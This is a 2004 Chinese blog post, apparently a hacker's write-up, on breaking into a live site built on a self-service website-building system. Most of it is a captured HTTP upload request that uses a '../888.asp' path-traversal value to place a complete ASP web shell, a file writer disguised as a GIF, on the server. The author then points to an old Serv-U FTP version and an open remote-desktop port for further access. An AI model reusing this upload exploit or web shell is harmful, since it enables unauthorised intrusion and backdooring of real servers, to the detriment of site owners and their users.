文章作者:HOKY原创
时间:2004年10月13日晚21:00
首先应该说明的是这次测试没有任何技术性。应该说是该系统的代码安全性过弱!
虽然有判断。但是还是执行了。
因为忙于一些其他的问题。已经好久没有测试站点了。在校园BBS上面看到有些朋友在"新竹自助网站系统"做的站点。然后在那里做广告。呵呵。我不喜欢这样的站点。于是准备测试一下这个系统的安全性。磨刀!
首先这个系统让我迷糊的是那里可以注册ID。郁闷了几分钟。真是好奇怪啊。[这个网站访问速度真是特慢啊!]
好不容易找到了一篇动画。还好他们知道作个动画。否则我估计没有几个人能知道怎么注册。呵呵。原来是在域名后面加个/zhuce 汗!
注册了一个吧。果然是在线自助建站系统。这样的系统没有毛病的很少啊!
首先当然是最容易的上传啊。这可是一点经验哦。
上传asp试探抓包
POST /admin/upLoad_bm1.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/msword, */*
Referer:
http://xzj.2000y.net/admin/uploa ... system&d=pdcktp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d43cb224a04c4
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; Alexa Toolbar)
Host: xzj.2000y.net
Content-Length: 2176
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCAQSDRAD=BMGPBAHCHEEECBKKBGFBADAL
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="filepath"
../888.asp ----------这个是后来改过的。
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="filelx"
1
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="EditName"
pdcktp
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="FormName"
system
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="depid"
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="act"
uploadfile
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="file1"; filename="C:\Documents and Settings\Administrator\桌面\后门\888.gif"
Content-Type: text/asp
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="Submit"
· 开始上传 ·
-----------------------------7d43cb224a04c4--
默认上传路径为
Content-Disposition: form-data; name="filepath"
uploadfile/
但是上传上去以后发现这个目录管理员禁止了教本。呵呵。没有办法。只能换个目录。
于是换成
Content-Disposition: form-data; name="filepath"
/888.asp
这上直接上传不上去。nc始终处于假死状态。
没有办法只能用下面的了。
Content-Disposition: form-data; name="filepath"
../888.asp
我的888.asp上传上去了。当然剩下的问题就简单了。哈哈。
Click to Open in New Window
而且他的Servu的版本是"220 Serv-U FTP Server v5.0 for WinSock ready..."
呵呵。搞定!3389本身就是开的。没有什么了。只是希望管理员能尽快补好漏洞。对Servu作些适当的安全。
我记得这个blog以前也发过一篇对上传漏洞的终结。有一个情况就是"虽然对上传各个参数进行了判断。但是没有施加处理。结果还是上传上去了。"
Click to Open in New Window
这个就不要怪别人了。哈哈。点到为止。拜拜!
